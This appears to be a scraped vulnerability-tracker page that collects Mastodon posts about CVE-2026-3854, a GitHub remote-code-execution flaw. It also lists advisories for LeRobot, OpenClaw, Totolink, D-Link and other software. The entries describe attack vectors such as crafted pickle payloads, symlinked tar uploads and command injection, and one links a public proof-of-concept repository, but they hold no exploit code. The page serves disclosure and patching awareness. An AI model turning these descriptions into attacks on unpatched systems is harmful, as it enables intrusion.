Wiz Research uncovers Remote Code Execution in GitHub.com and GitHub Enterprise Server (CVE-2026-3854) wiz.io/blog/github-rce-vulnera

##

undercodenews@mastodon.social at 2026-04-28T21:45:04.000Z ##

Critical GitHub Vulnerability CVE-2026-3854 Enables Remote Code Execution via Simple Git Push + Video

Introduction: A Silent Flaw Inside a Trusted Developer Ecosystem A newly discovered security vulnerability inside GitHub has exposed a dangerous weakness in one of the most widely trusted development platforms in the world. Identified as CVE-2026-3854, this flaw allows attackers to execute malicious code on backend systems using nothing more than a carefully crafted…

undercodenews.com/critical-git

##

hackersnews@mastodon.cesium.pw at 2026-04-28T20:30:11.000Z ##

GitHub RCE Vulnerability: CVE-2026-3854 Breakdown
news.ycombinator.com/item?id=4

#hackernews #tech

##

iamdtms@mas.to at 2026-04-28T20:22:39.000Z ##

Researchers Discover Critical GitHub CVE-2026-3854 RCE Flaw Exploitable via Single Git Push thehackernews.com/2026/04/rese

##

lobsters@mastodon.social at 2026-04-28T19:55:16.000Z ##

GitHub RCE Vulnerability: CVE-2026-3854 Breakdown lobste.rs/s/8fxgx7 #security #vibecoding
wiz.io/blog/github-rce-vulnera

##

hn100@social.lansky.name at 2026-04-28T19:45:08.000Z ##

GitHub RCE Vulnerability: CVE-2026-3854 Breakdown

Link: wiz.io/blog/github-rce-vulnera
Discussion: news.ycombinator.com/item?id=4

##

hn50@social.lansky.name at 2026-04-28T19:00:06.000Z ##

GitHub RCE Vulnerability: CVE-2026-3854 Breakdown

Link: wiz.io/blog/github-rce-vulnera
Discussion: news.ycombinator.com/item?id=4

##

newsycombinator@framapiaf.org at 2026-04-28T19:00:10.000Z ##

GitHub RCE Vulnerability: CVE-2026-3854 Breakdown
Link: wiz.io/blog/github-rce-vulnera
Comments: news.ycombinator.com/item?id=4

##

Xavier at 2026-04-28T18:59:08.469Z ##

@GossiTheDog Here's a non-Twitter link: wiz.io/blog/github-rce-vulnera

##

blainsmith@fosstodon.org at 2026-04-28T18:58:41.000Z ##

HAHAHAHAHHAHAHAHAHAHAH wiz.io/blog/github-rce-vulnera

##

GossiTheDog@cyberplace.social at 2026-04-28T18:56:22.000Z ##

Wiz got RCE on the cloud version of Github.com and access to every customer environment.

To do this they just reversed the on prem version and found a simple vuln.

wiz.io/blog/github-rce-vulnera

##

hackerworkspace at 2026-04-28T18:27:48.520Z ##

GitHub RCE Vulnerability: CVE-2026-3854 Breakdown | Wiz Blog

wiz.io/blog/github-rce-vulnera

Read on HackerWorkspace: hackerworkspace.com/article/gi

##

ngate@mastodon.social at 2026-04-28T18:23:21.000Z ##

🎉 BREAKING NEWS: #Hackers discover GitHub's secret Easter egg, allowing anyone with a pulse to play "Command & Conquer" on their backend servers! 😂 A riveting tale of how to hack into the Matrix using nothing but a 'git' command — surely, Neo is quaking in his boots. 🕶️
wiz.io/blog/github-rce-vulnera #GitHub #EasterEgg #CommandAndConquer #HackingIntoTheMatrix #NeoQuaking #HackerNews #ngated

##

h4ckernews@mastodon.social at 2026-04-28T18:23:16.000Z ##

GitHub RCE Vulnerability: CVE-2026-3854 Breakdown

wiz.io/blog/github-rce-vulnera

#HackerNews #GitHub #RCE #Vulnerability #CVE-2026-3854 #Cybersecurity #Vulnerability #Analysis #InfoSec

##

hnbot@chrispelli.fun at 2026-04-28T18:23:09.000Z ##

GitHub RCE Vulnerability: CVE-2026-3854 Breakdown - wiz.io/blog/github-rce-vulnera

#hackernews

##

mastokukei@social.josko.org at 2026-04-28T18:02:50.000Z ##

Updates**
- GitHub availability issues and service disruptions
- BookStack migrating from GitHub to Codeberg
- GitHub RCE vulnerability (CVE-2026-3854)

3. **Privacy and Security Concerns**
- Period tracking apps selling data to Meta
- Signal phishing attacks targeting journalists and politicians
- "Pack2TheRoot" Linux vulnerability affecting multiple distributions

4. **Tech Industry and Corporate News**
- Google’s Pentagon AI deal despite employee [2/4]

##

CuratedHackerNews@mastodon.social at 2026-04-28T17:35:05.000Z ##

GitHub RCE Vulnerability: CVE-2026-3854 Breakdown

wiz.io/blog/github-rce-vulnera

#github

##

bortzmeyer@mastodon.gougere.fr at 2026-04-28T16:53:20.000Z ##

Beaucoup de gens vont sans doute résumer la faille de sécurité CVE-2026-3854 en « Mon Dieu, la totalité des logiciels hébergés sur GitHub ont peut-être été compromis ».

Mais, en fait, c'était déjà possible, Microsoft (propriétaire de GitHub) pouvait déjà tout modifier.

Tout ce qu'a permis CVE-2026-3854, si des gens l'ont exploité, c'est de démocratiser cette possibilité, en la rendant accessible à tous les gens ayant un compte GitHub.

wiz.io/blog/github-rce-vulnera

##

hn250@social.lansky.name at 2026-04-29T02:10:12.000Z ##

GitHub RCE Vulnerability: CVE-2026-3854 Breakdown

Link: wiz.io/blog/github-rce-vulnera
Discussion: news.ycombinator.com/item?id=4

##

wwahammy@treehouse.systems at 2026-04-29T01:20:29.000Z ##

There should be a "but the service is never up to be exploited" reducer on the CVE score.
wiz.io/blog/github-rce-vulnera

##

jschauma@mstdn.social at 2026-04-29T00:36:54.000Z ##

Question about the GitHub RCE:

wiz.io/blog/github-rce-vulnera says GHES patches were _released_ on 03/10.

github.blog/security/securing- says "we _prepared_ patches [...] and published CVE-2026-3854. These are _available today_".

So were GHES patches made available to customers at the time of CVE publication or only today, 1.5 months laster?

##

obivan@infosec.exchange at 2026-04-28T21:53:56.000Z ##

Wiz Research uncovers Remote Code Execution in GitHub.com and GitHub Enterprise Server (CVE-2026-3854) wiz.io/blog/github-rce-vulnera

##

hackersnews@mastodon.cesium.pw at 2026-04-28T20:30:11.000Z ##

GitHub RCE Vulnerability: CVE-2026-3854 Breakdown
news.ycombinator.com/item?id=4

#hackernews #tech

##

lobsters@mastodon.social at 2026-04-28T19:55:16.000Z ##

GitHub RCE Vulnerability: CVE-2026-3854 Breakdown lobste.rs/s/8fxgx7 #security #vibecoding
wiz.io/blog/github-rce-vulnera

##

hn100@social.lansky.name at 2026-04-28T19:45:08.000Z ##

GitHub RCE Vulnerability: CVE-2026-3854 Breakdown

Link: wiz.io/blog/github-rce-vulnera
Discussion: news.ycombinator.com/item?id=4

##

hn50@social.lansky.name at 2026-04-28T19:00:06.000Z ##

GitHub RCE Vulnerability: CVE-2026-3854 Breakdown

Link: wiz.io/blog/github-rce-vulnera
Discussion: news.ycombinator.com/item?id=4

##

newsycombinator@framapiaf.org at 2026-04-28T19:00:10.000Z ##

GitHub RCE Vulnerability: CVE-2026-3854 Breakdown
Link: wiz.io/blog/github-rce-vulnera
Comments: news.ycombinator.com/item?id=4

##

Xavier@infosec.exchange at 2026-04-28T18:59:08.000Z ##

@GossiTheDog Here's a non-Twitter link: wiz.io/blog/github-rce-vulnera

##

blainsmith@fosstodon.org at 2026-04-28T18:58:41.000Z ##

HAHAHAHAHHAHAHAHAHAHAH wiz.io/blog/github-rce-vulnera

##

GossiTheDog@cyberplace.social at 2026-04-28T18:56:22.000Z ##

Wiz got RCE on the cloud version of Github.com and access to every customer environment.

To do this they just reversed the on prem version and found a simple vuln.

wiz.io/blog/github-rce-vulnera

##

hackerworkspace@infosec.exchange at 2026-04-28T18:27:48.000Z ##

GitHub RCE Vulnerability: CVE-2026-3854 Breakdown | Wiz Blog

wiz.io/blog/github-rce-vulnera

Read on HackerWorkspace: hackerworkspace.com/article/gi

#aisecurity #vulnerability #exploit

##

ngate@mastodon.social at 2026-04-28T18:23:21.000Z ##

🎉 BREAKING NEWS: #Hackers discover GitHub's secret Easter egg, allowing anyone with a pulse to play "Command & Conquer" on their backend servers! 😂 A riveting tale of how to hack into the Matrix using nothing but a 'git' command — surely, Neo is quaking in his boots. 🕶️
wiz.io/blog/github-rce-vulnera #GitHub #EasterEgg #CommandAndConquer #HackingIntoTheMatrix #NeoQuaking #HackerNews #ngated

##

h4ckernews@mastodon.social at 2026-04-28T18:23:16.000Z ##

GitHub RCE Vulnerability: CVE-2026-3854 Breakdown

wiz.io/blog/github-rce-vulnera

#HackerNews #GitHub #RCE #Vulnerability #CVE-2026-3854 #Cybersecurity #Vulnerability #Analysis #InfoSec

##

CuratedHackerNews@mastodon.social at 2026-04-28T17:35:05.000Z ##

GitHub RCE Vulnerability: CVE-2026-3854 Breakdown

wiz.io/blog/github-rce-vulnera

#github

##

bortzmeyer@mastodon.gougere.fr at 2026-04-28T16:53:20.000Z ##

Beaucoup de gens vont sans doute résumer la faille de sécurité CVE-2026-3854 en « Mon Dieu, la totalité des logiciels hébergés sur GitHub ont peut-être été compromis ».

Mais, en fait, c'était déjà possible, Microsoft (propriétaire de GitHub) pouvait déjà tout modifier.

Tout ce qu'a permis CVE-2026-3854, si des gens l'ont exploité, c'est de démocratiser cette possibilité, en la rendant accessible à tous les gens ayant un compte GitHub.

wiz.io/blog/github-rce-vulnera

##

CVE-2026-25874
(9.8 CRITICAL)

EPSS: 0.06%

updated 2026-04-28T19:01:40.377000

4 posts

LeRobot through 0.5.1 contains an unsafe deserialization vulnerability in the async inference pipeline where pickle.loads() is used to deserialize data received over unauthenticated gRPC channels without TLS in the policy server and robot client components. An unauthenticated network-reachable attacker can achieve arbitrary code execution on the server or client by sending a crafted pickle payload

netsecio@mastodon.social at 2026-04-28T16:41:17.000Z ##

📰 Critical Unpatched RCE Flaw in Hugging Face's LeRobot AI Platform Puts Robotics Systems at Risk

🚨 CRITICAL FLAW: Unpatched RCE (CVE-2026-25874, CVSS 9.3) in Hugging Face's LeRobot AI platform. Unsafe deserialization allows unauthenticated attackers to execute code. #CVE202625874 #HuggingFace #AI #RCE

🔗 cyber.netsecops.io

##

netsecio@mastodon.social at 2026-04-28T16:41:17.000Z ##

📰 Critical Unpatched RCE Flaw in Hugging Face's LeRobot AI Platform Puts Robotics Systems at Risk

🚨 CRITICAL FLAW: Unpatched RCE (CVE-2026-25874, CVSS 9.3) in Hugging Face's LeRobot AI platform. Unsafe deserialization allows unauthenticated attackers to execute code. #CVE202625874 #HuggingFace #AI #RCE

🔗 cyber.netsecops.io

##

mttaggart@infosec.exchange at 2026-04-28T13:05:15.000Z ##

May I suggest...not exposing your robot control plane to the internet

resecurity.com/blog/article/cv

##

jbhall56@infosec.exchange at 2026-04-28T12:29:27.000Z ##

The vulnerability in question is CVE-2026-25874 (CVSS score: 9.3), which has been described as a case of untrusted data deserialization stemming from the use of the unsafe pickle format. thehackernews.com/2026/04/crit

##

CVE-2026-41364
(8.1 HIGH)

EPSS: 0.12%

updated 2026-04-28T18:45:44.107000

1 posts

OpenClaw before 2026.3.31 contains a symlink following vulnerability in SSH sandbox tar upload that allows remote attackers to write arbitrary files. Attackers can exploit this by uploading tar archives containing symlinks to escape the sandbox and overwrite files on the remote host.

thehackerwire@mastodon.social at 2026-04-28T00:59:55.000Z ##

🟠 CVE-2026-41364 - High (8.1)

OpenClaw before 2026.3.31 contains a symlink following vulnerability in SSH sandbox tar upload that allows remote attackers to write arbitrary files. Attackers can exploit this by uploading tar archives containing symlinks to escape the sandbox an...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-41371
(8.5 HIGH)

EPSS: 0.04%

updated 2026-04-28T18:44:10.780000

1 posts

OpenClaw before 2026.3.28 contains a privilege escalation vulnerability in chat.send that allows write-scoped gateway callers to trigger admin-only session reset operations. Attackers can rotate target sessions, archive prior transcript state, and force new session IDs without requiring admin scope by exploiting improper authorization checks in the chat.send path.

thehackerwire@mastodon.social at 2026-04-28T00:18:44.000Z ##

🟠 CVE-2026-41371 - High (8.5)

OpenClaw before 2026.3.28 contains a privilege escalation vulnerability in chat.send that allows write-scoped gateway callers to trigger admin-only session reset operations. Attackers can rotate target sessions, archive prior transcript state, and...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-33277
(8.8 HIGH)

EPSS: 0.23%

updated 2026-04-28T18:43:10.593000

2 posts

An OS command Injection issue exists in LogonTracer prior to v2.0.0. An arbitrary OS command may be executed by a logged-in user.

offseq@infosec.exchange at 2026-04-27T03:00:28.000Z ##

⚠️ HIGH severity: OS command injection in JPCERT/CC LogonTracer before v2.0.0 (CVE-2026-33277). Logged-in users can run arbitrary OS commands. Restrict access & monitor logs until patch available. radar.offseq.com/threat/cve-20 #OffSeq #Vuln #LogonTracer #Infosec

##

thehackerwire@mastodon.social at 2026-04-27T00:22:28.000Z ##

🟠 CVE-2026-33277 - High (8.8)

An OS command Injection issue exists in LogonTracer prior to v2.0.0. An arbitrary OS command may be executed by a logged-in user.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-41602
(7.5 HIGH)

EPSS: 0.02%

updated 2026-04-28T18:40:25.530000

2 posts

Integer Overflow or Wraparound vulnerability in Apache Thrift TFramedTransport Go language implementation This issue affects Apache Thrift: before 0.23.0. Users are recommended to upgrade to version 0.23.0, which fixes the issue.

thehackerwire@mastodon.social at 2026-04-29T01:00:17.000Z ##

🟠 CVE-2026-41602 - High (7.5)

Integer Overflow or Wraparound vulnerability in Apache Thrift TFramedTransport Go language implementation

This issue affects Apache Thrift: before 0.23.0.

Users are recommended to upgrade to version 0.23.0, which fixes the issue.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-04-29T01:00:17.000Z ##

🟠 CVE-2026-41602 - High (7.5)

Integer Overflow or Wraparound vulnerability in Apache Thrift TFramedTransport Go language implementation

This issue affects Apache Thrift: before 0.23.0.

Users are recommended to upgrade to version 0.23.0, which fixes the issue.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-41472
(6.1 MEDIUM)

EPSS: 0.67%

updated 2026-04-28T18:31:36

1 posts

CyberPanel versions prior to 2.4.4 contain a stored cross-site scripting vulnerability in the AI Scanner dashboard where the POST /api/ai-scanner/callback endpoint lacks authentication and allows unauthenticated attackers to inject malicious JavaScript by overwriting the findings_json field of ScanHistory records. Attackers can inject JavaScript that executes in an administrator's authenticated se

secdb@infosec.exchange at 2026-04-27T00:01:17.000Z ##

📈 CVE Published in last 7 days (2026-04-20 - 2026-04-27)
See more at secdb.nttzen.cloud/dashboard

Total CVEs: 1459

Severity:
- Critical: 124
- High: 358
- Medium: 586
- Low: 70
- None: 321

Status:
- : 40
- Analyzed: 313
- Awaiting Analysis: 570
- Deferred: 238
- Modified: 9
- Received: 124
- Rejected: 23
- Undergoing Analysis: 142

Top CNAs:
- GitHub, Inc.: 326
- kernel.org: 257
- VulnCheck: 119
- VulDB: 114
- Oracle: 102
- MITRE: 69
- Wordfence: 67
- Canonical Ltd.: 46
- Mozilla Corporation: 42
- N/A: 40

Top Affected Products:
- UNKNOWN: 1040
- Openclaw: 42
- Mozilla Firefox: 39
- Mozilla Thunderbird: 38
- Oracle Mysql Server: 25
- Wwbn Avideo: 18
- Flowiseai Flowise: 18
- Uutils Coreutils: 14
- Silextechnology Sd-330ac Firmware: 11
- Gitlab: 11

Top EPSS Score:
- CVE-2026-5965 - 6.34 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2026-41179 - 5.98 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2026-40887 - 4.56 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2026-38834 - 3.22 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2026-41176 - 2.79 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2026-21571 - 1.10 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2026-6799 - 1.06 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2026-24467 - 0.76 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2026-41472 - 0.67 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2019-25714 - 0.60 % (secdb.nttzen.cloud/cve/detail/)

##

CVE-2026-42426(CVSS UNKNOWN)

EPSS: 0.00%

updated 2026-04-28T18:28:53

2 posts

## Impact OpenClaw `node.pair.approve` placed in `operator.write` scope instead of `operator.pairing` allows unprivileged pairing approval. The pairing approval method accepted operator.write instead of the narrower pairing scope and admin requirement for exec-capable nodes. OpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a

thehackerwire@mastodon.social at 2026-04-28T21:02:23.000Z ##

🟠 CVE-2026-42426 - High (8.8)

OpenClaw before 2026.4.8 contains an improper authorization vulnerability where the node.pair.approve method accepts operator.write scope instead of the narrower operator.pairing scope, allowing unprivileged users to approve node pairing. Attacker...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-04-28T21:02:23.000Z ##

🟠 CVE-2026-42426 - High (8.8)

OpenClaw before 2026.4.8 contains an improper authorization vulnerability where the node.pair.approve method accepts operator.write scope instead of the narrower operator.pairing scope, allowing unprivileged users to approve node pairing. Attacker...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-41399(CVSS UNKNOWN)

EPSS: 0.00%

updated 2026-04-28T18:22:28

2 posts

## Summary The gateway accepted unbounded concurrent unauthenticated WebSocket upgrades before allocating them to an authenticated session budget. ## Impact An unauthenticated network attacker could consume socket and worker capacity and disrupt WebSocket availability for legitimate clients. ## Affected Component `src/gateway/server-http.ts, src/gateway/server/preauth-connection-budget.ts` #

thehackerwire@mastodon.social at 2026-04-28T21:49:58.000Z ##

🟠 CVE-2026-41399 - High (7.5)

OpenClaw before 2026.3.28 accepts unbounded concurrent unauthenticated WebSocket upgrades without pre-authentication budget allocation. Unauthenticated network attackers can exhaust socket and worker capacity to disrupt WebSocket availability for ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-04-28T21:49:58.000Z ##

🟠 CVE-2026-41399 - High (7.5)

OpenClaw before 2026.3.28 accepts unbounded concurrent unauthenticated WebSocket upgrades without pre-authentication budget allocation. Unauthenticated network attackers can exhaust socket and worker capacity to disrupt WebSocket availability for ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-41394(CVSS UNKNOWN)

EPSS: 0.00%

updated 2026-04-28T18:20:50

2 posts

## Summary Unauthenticated plugin-auth HTTP routes receive operator runtime scopes ## Current Maintainer Triage - Status: narrow - Normalized severity: medium - Assessment: v2026.3.28 still gives auth:"plugin" routes operator WRITE_SCOPE, but impact should stay limited to plugin routes that actually touch privileged runtime actions before plugin auth completes. ## Affected Packages / Versions -

thehackerwire@mastodon.social at 2026-04-28T22:00:01.000Z ##

🟠 CVE-2026-41394 - High (8.2)

OpenClaw before 2026.3.31 contains an authentication bypass vulnerability where unauthenticated plugin-auth HTTP routes receive operator runtime write scopes. Attackers can access these routes without authentication to perform privileged runtime a...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-04-28T22:00:01.000Z ##

🟠 CVE-2026-41394 - High (8.2)

OpenClaw before 2026.3.31 contains an authentication bypass vulnerability where unauthenticated plugin-auth HTTP routes receive operator runtime write scopes. Attackers can access these routes without authentication to perform privileged runtime a...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-41387
(9.7 CRITICAL)

EPSS: 0.00%

updated 2026-04-28T18:18:46

2 posts

## Summary Host exec env override sanitization did not fail closed for several package-manager and related redirect variables that can steer dependency fetches or startup behavior. ## Impact An approved exec request could silently redirect package resolution or runtime bootstrap to attacker-controlled infrastructure and execute trojanized content. ## Affected Component `src/infra/host-env-sec

thehackerwire@mastodon.social at 2026-04-28T22:31:12.000Z ##

🟠 CVE-2026-41387 - High (7.8)

OpenClaw before 2026.3.22 contains an incomplete host environment variable sanitization vulnerability in host-env-security-policy.json and host-env-security.ts that allows package-manager environment overrides. Attackers can exploit approved exec ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-04-28T22:31:12.000Z ##

🟠 CVE-2026-41387 - High (7.8)

OpenClaw before 2026.3.22 contains an incomplete host environment variable sanitization vulnerability in host-env-security-policy.json and host-env-security.ts that allows package-manager environment overrides. Attackers can exploit approved exec ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-41386(CVSS UNKNOWN)

EPSS: 0.00%

updated 2026-04-28T18:18:23

2 posts

## Summary Bootstrap setup codes were not bound to the intended device role and scopes, allowing first-use privilege escalation during pairing. ## Current Maintainer Triage - Status: open - Normalized severity: high - Assessment: Real first-use bootstrap privilege-escalation bug fixed and shipped in v2026.3.22+, so keep open for publication with current severity. ## Affected Packages / Versions

thehackerwire@mastodon.social at 2026-04-28T22:30:45.000Z ##

🔴 CVE-2026-41386 - Critical (9.1)

OpenClaw before 2026.3.22 contains a privilege escalation vulnerability where bootstrap setup codes are not bound to intended device roles and scopes during pairing. Attackers can exploit this during first-use device pairing to escalate privileges...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-04-28T22:30:45.000Z ##

🔴 CVE-2026-41386 - Critical (9.1)

OpenClaw before 2026.3.22 contains a privilege escalation vulnerability where bootstrap setup codes are not bound to intended device roles and scopes during pairing. Attackers can exploit this during first-use device pairing to escalate privileges...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-41384(CVSS UNKNOWN)

EPSS: 0.00%

updated 2026-04-28T18:17:40

2 posts

## Summary Incomplete Fix for CVE-2026-4039: CLI Backend Environment Variable Injection via Workspace Config ## Current Maintainer Triage - Status: open - Normalized severity: high - Assessment: Real shipped malicious-workspace-config env injection in the CLI backend runner, fixed by sanitizing backend env before spawn and shipped in v2026.3.24, so advisory stays open until published. ## Affecte

thehackerwire@mastodon.social at 2026-04-28T22:30:33.000Z ##

🟠 CVE-2026-41384 - High (7.8)

OpenClaw before 2026.3.24 contains an environment variable injection vulnerability in the CLI backend runner that allows attackers to inject malicious environment variables through workspace configuration. Attackers can craft malicious workspace c...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-04-28T22:30:33.000Z ##

🟠 CVE-2026-41384 - High (7.8)

OpenClaw before 2026.3.24 contains an environment variable injection vulnerability in the CLI backend runner that allows attackers to inject malicious environment variables through workspace configuration. Attackers can craft malicious workspace c...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-41383(CVSS UNKNOWN)

EPSS: 0.00%

updated 2026-04-28T18:17:19

2 posts

## Summary Before OpenClaw 2026.4.2, the OpenShell mirror backend accepted arbitrary absolute `remoteWorkspaceDir` and `remoteAgentWorkspaceDir` values. In mirror mode, those paths were then used as the target of remote cleanup and overwrite operations. ## Impact If an attacker could influence those OpenShell config values, mirror sync could delete the contents of an unintended remote directory

thehackerwire@mastodon.social at 2026-04-28T22:00:22.000Z ##

🟠 CVE-2026-41383 - High (8.1)

OpenClaw before 2026.4.2 contains an arbitrary directory deletion vulnerability in mirror mode that allows attackers to delete remote directories by influencing remoteWorkspaceDir and remoteAgentWorkspaceDir configuration values. Attackers can man...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-04-28T22:00:22.000Z ##

🟠 CVE-2026-41383 - High (8.1)

OpenClaw before 2026.4.2 contains an arbitrary directory deletion vulnerability in mirror mode that allows attackers to delete remote directories by influencing remoteWorkspaceDir and remoteAgentWorkspaceDir configuration values. Attackers can man...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-41378(CVSS UNKNOWN)

EPSS: 0.00%

updated 2026-04-28T18:15:32

2 posts

## Summary Paired node escalates to gateway RCE via unrestricted node.event agent dispatch ## Current Maintainer Triage - Status: narrow - Normalized severity: high - Assessment: v2026.3.28 still lets paired role=node clients drive node.event agent.request into broader gateway-side tool access than node RPCs, but critical is overstated because a trusted paired node foothold is already required.

thehackerwire@mastodon.social at 2026-04-28T22:31:31.000Z ##

🟠 CVE-2026-41378 - High (8.8)

OpenClaw before 2026.3.31 contains a privilege escalation vulnerability allowing paired nodes with role=node to dispatch node.event agent requests with unrestricted gateway-side tool access. Attackers with trusted paired node credentials can escal...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-04-28T22:31:31.000Z ##

🟠 CVE-2026-41378 - High (8.8)

OpenClaw before 2026.3.31 contains a privilege escalation vulnerability allowing paired nodes with role=node to dispatch node.event agent requests with unrestricted gateway-side tool access. Attackers with trusted paired node credentials can escal...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7040
(7.5 HIGH)

EPSS: 0.04%

updated 2026-04-28T15:16:33.807000

1 posts

Text::Minify::XS versions from v0.3.0 before v0.7.8 for Perl have a heap overflow when processing some malformed UTF-8 characters. The minify functions mishandled some malformed UTF-8 characters, leading to heap corruption. Note that the minify_utf8 function is an alias for minify.

thehackerwire@mastodon.social at 2026-04-27T15:22:55.000Z ##

🟠 CVE-2026-7040 - High (7.5)

Text::Minify::XS versions from v0.3.0 before v0.7.8 for Perl have a heap overflow when processing some malformed UTF-8 characters.

The minify functions mishandled some malformed UTF-8 characters, leading to heap corruption.

Note that the minify_...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-35431
(10.0 CRITICAL)

EPSS: 0.07%

updated 2026-04-28T12:10:53.103000

2 posts

Server-side request forgery (ssrf) in Microsoft Entra ID Entitlement Management allows an unauthorized attacker to perform spoofing over a network.

beyondmachines1 at 2026-04-28T16:01:29.610Z ##

Microsoft Patches Critical CVSS 10.0 SSRF Vulnerability in Entra ID

Microsoft patched a critical SSRF vulnerability (CVE-2026-35431) in Entra ID Entitlement Management with a CVSS score of 10.0 that allowed unauthenticated spoofing and internal network access. The flaw was fixed server-side, requiring no action from users to secure their environments.

**No action is needed on your part, Microsoft already fixed this vulnerability on their cloud servers on April 23, 2026. As a good practice, review your Entra ID sign-in and audit logs for any unusual activity from before that date, and ensure multi-factor authentication is enforced for all admin accounts.**

beyondmachines.net/event_detai

##

beyondmachines1@infosec.exchange at 2026-04-28T16:01:29.000Z ##

Microsoft Patches Critical CVSS 10.0 SSRF Vulnerability in Entra ID

Microsoft patched a critical SSRF vulnerability (CVE-2026-35431) in Entra ID Entitlement Management with a CVSS score of 10.0 that allowed unauthenticated spoofing and internal network access. The flaw was fixed server-side, requiring no action from users to secure their environments.

**No action is needed on your part, Microsoft already fixed this vulnerability on their cloud servers on April 23, 2026. As a good practice, review your Entra ID sign-in and audit logs for any unusual activity from before that date, and ensure multi-factor authentication is enforced for all admin accounts.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

CVE-2026-7243
(9.8 CRITICAL)

EPSS: 0.89%

updated 2026-04-28T09:34:20

1 posts

A vulnerability was identified in Totolink A8000RU 7.1cu.643_b20200521. The affected element is the function setRadvdCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument maxRtrAdvInterval leads to os command injection. It is possible to initiate the attack remotely. The exploit is publicly available and might be used.

offseq@infosec.exchange at 2026-04-28T12:30:30.000Z ##

🚨 CVE-2026-7243: Critical OS command injection in Totolink A8000RU (7.1cu.643_b20200521). Remote, unauthenticated RCE risk — public exploit out, no patch yet. Lock down management access & monitor for updates. radar.offseq.com/threat/cve-20 #OffSeq #Vulnerability #RouterSecurity

##

CVE-2026-7248
(9.8 CRITICAL)

EPSS: 0.06%

updated 2026-04-28T09:34:20

1 posts

A vulnerability was found in D-Link DI-8100 16.07.26A1. This affects the function tgfile_htm of the file tgfile.htm of the component CGI Endpoint. The manipulation of the argument fn results in buffer overflow. The attack can be executed remotely. The exploit has been made public and could be used.

offseq@infosec.exchange at 2026-04-28T09:30:29.000Z ##

⚠️ CRITICAL: CVE-2026-7248 in D-Link DI-8100 (fw 16.07.26A1) enables remote buffer overflow via 'fn' in CGI Endpoint. No patch available — restrict access & monitor for updates. Exploit code is public. radar.offseq.com/threat/cve-20 #OffSeq #DLink #Vuln #Infosec

##

CVE-2026-5201
(7.5 HIGH)

EPSS: 0.09%

updated 2026-04-28T09:16:17.017000

1 posts

A flaw was found in the gdk-pixbuf library. This heap-based buffer overflow vulnerability occurs in the JPEG image loader due to improper validation of color component counts when processing a specially crafted JPEG image. A remote attacker can exploit this flaw without user interaction, for example, via thumbnail generation. Successful exploitation leads to application crashes and denial of servi

1 repos

https://github.com/kagancapar/CVE-2026-5201

linux@activitypub.awakari.com at 2026-04-28T03:12:25.000Z ## Oracle Linux 9 gdk-pixbuf2 Important Fix ELSA-2026-10708 CVE-2026-5201 The following updated rpms for Oracle Linux 9 have been uploaded to the Unbreakable Linux Network:

#Oracle #Linux #Distribution #- #Security #Advisories

Origin | Interest | Match ##

CVE-2026-7202
(9.8 CRITICAL)

EPSS: 0.89%

updated 2026-04-28T03:31:36

2 posts

